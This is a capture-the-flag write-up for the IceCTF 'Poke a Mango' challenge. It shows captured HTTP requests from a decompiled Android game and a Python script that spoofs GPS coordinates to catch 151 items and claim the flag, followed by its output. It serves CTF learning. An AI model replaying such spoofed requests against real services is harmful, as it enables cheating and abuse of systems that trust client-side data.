IceCTF – Poke a Mango
This test provides us an APK file through this link, called pokeamango.apk.
Analysis
This android application is similar to Pokemon GO, it’s about capturing mangoes, to be able to buy the flag once you have 151 captured. Analyzing the apk with jadx-gui, you can see the requests that we need. A first request lists the «mangoes» that we have nearby:
REQUEST:
POST /mango/list HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 51
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close
lat=41.0777778&long=1.1799998&uuid=8fb6f1840fee5a88
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:50:54 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 459178f855833c1d-CDG
Content-Length: 866
{"mangos":[{"lat":41.0775367,"lng":1.1778177},{"lat":41.07847469999999,"lng":1.1795604},{"lat":41.0794147,"lng":1.1805652},{"lat":41.07758399999999,"lng":1.1782649},{"lat":41.0791775,"lng":1.1795028},{"lat":41.0782402,"lng":1.1797446},{"lat":41.0774597,"lng":1.1774596},{"lat":41.0781927,"lng":1.1809616},{"lat":41.0764728,"lng":1.1798654},{"lat":41.0764401,"lng":1.1799138},{"lat":41.076082,"lng":1.179158},{"lat":41.077837,"lng":1.1797852},{"lat":41.07882900000001,"lng":1.17955},{"lat":41.076564,"lng":1.179783},{"lat":41.0772666,"lng":1.1797385},{"lat":41.0773042,"lng":1.1791576},{"lat":41.07715779999999,"lng":1.1810705},{"lat":41.076599,"lng":1.180543},{"lat":41.0767187,"lng":1.1809404},{"lat":41.07724479999999,"lng":1.178256}],"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
And another request that captures them:
REQUEST:
POST /mango/catch HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 97
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close
curLat=41.0777778&curLong=1.1799998&mangoLat=41.0775367&mangoLong=1.1778177&uuid=8fb6f1840fee5a88
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:53:13 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 45917c57f3523bf3-CDG
Content-Length: 156
{"message":"Mango Caught!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
Well, with these two request we can capture 151 mangoes, and get the flag with this request:
REQUEST:
POST /store/flag HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 21
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close
uuid=8fb6f1840fee5a88
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 10:53:00 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 4591d3efe0ae3c0b-CDG
Content-Length: 208
{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
Here I coded a python script for get the flag:
#!/usr/bin/env python
#coding: utf8
import requests
import json
import sys
UUID = "8fb6f1840fee5a77"
def getCoordinates(lat,lng):
burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/list"
burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
burp0_data={"lat": "%s"%clat, "long": "%s"%clng, "uuid": "%s"%UUID}
r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
if r.status_code is 200: #Success
return r.text
else: #error
return 1
def getMango(clat,clng,lat,lng):
burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/catch"
burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
burp0_data={"curLat": "%s"%clat, "curLong": "%s"%clng, "mangoLat": "%s"%lat, "mangoLong": "%s"%lng, "uuid": "%s"%UUID}
r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
if r.status_code is 200: #Success
return r.text
else: #error
return 1
def getCount():
burp0_url = "http://pokeamango.vuln.icec.tf:80/mango/count"
burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
burp0_data={"uuid": "%s"%UUID}
r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
if r.status_code is 200: #Success
return r.text
else: #error
return 1
def getFlag():
burp0_url = "http://pokeamango.vuln.icec.tf:80/store/flag"
burp0_cookies = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
burp0_headers = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}
burp0_data={"uuid": "%s"%UUID}
r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
if r.status_code is 200: #Success
return r.text
else: #error
return 1
for j in range(100):
for i in range(0,999):
clat = "41.0%s77778"%i#current lat
clng = "1.1%s99998"%i#current long
count = getCount()
while count == 1:#because the web is inestable
count = getCount()
if count[9:12] == '151':
print getFlag();
sys.exit(0)
response = getCoordinates(clat,clng)
if response != 1:
data = json.loads(response)
for i in range(len(data["mangos"])):
lat = data["mangos"][i]["lat"]
lng = data["mangos"][i]["lng"]
print "sending lat %s and lng %s"%(lat,lng)
get = getMango(clat,clng,lat,lng)
while get == 1:#because the web is inestable
get = getMango(clat,clng,lat,lng)
Example of script execution:
$ python script.py
sending lat 41.0663526 and lng 1.1709858
sending lat 41.0665607 and lng 1.1705412
sending lat 41.0962592 and lng 1.2006501
sending lat 41.06087 and lng 1.16179
...
sending lat 41.0839905 and lng 1.1853429
sending lat 41.0853402 and lng 1.183156
sending lat 41.0839701 and lng 1.1853559
{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE3NyJ9.7b1ZlrmCDiWimU2JdKnfkbwuUZkoOTvvIYU1x9JTUJ4"}
Cheers!